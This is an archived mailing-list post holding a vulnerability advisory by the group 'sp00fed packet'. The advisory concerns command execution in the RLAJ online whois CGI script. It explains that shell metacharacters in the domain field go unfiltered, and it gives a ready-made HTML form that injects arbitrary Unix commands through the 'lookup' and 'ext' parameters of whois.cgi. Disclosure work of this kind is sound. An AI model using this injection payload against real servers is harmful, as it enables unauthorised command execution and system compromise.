[sp00fed packet] Whois vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 




Read the attached advisory.

-- 
WBR, Zeux.
Origin: Truth is not always the same as the majority decision
--- Zeux<zeux@inbox.ru> from sp00fed packet
Mail: zeux@inbox.ru zeux@secforum.net zeux@undergrounda.net
/----------------+--------------------------------------+-------------\
| sp00fed packet |                                      | advisory #1 |
+----------------+--------------------------------------+-------------+
| Product: RLAJ on-line whois service                                 |
| Vulnerability: command execution                                    |
| Danger: high                                                        |
| Vendor: http://www.rlaj.com/                                        |
\---------------------------------------------------------------------/
    ::Description::
 This whois service doesn't filter special symbols, so you can enter
|<any *nix command>| into domain name field. But domain name can not
contain "." symbols. There is one more method. Just use this form:

<form method=post action="http://server/cgi-bin/whois/whois.cgi";>
<input type=hidden name="lookup" value=";"> Cmd:
<input type="text" name="ext"><input type=submit value="Go">
</form>
 The script is popular (385 people have downloaded it at www.cgi.ru
(Russian public collection of scripts)), so the danger is high.

    ::Vendor::
 Vendor was informed 2 days ago. No response was received.

    ::Contacts::
 [http://www.sp00fed.ru/] sp00fed packet
 [zeux@inbox.ru] Zeux (it's me ;)
 [spikir@rbcmail.ru] Spikir (team coordinator)
 

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux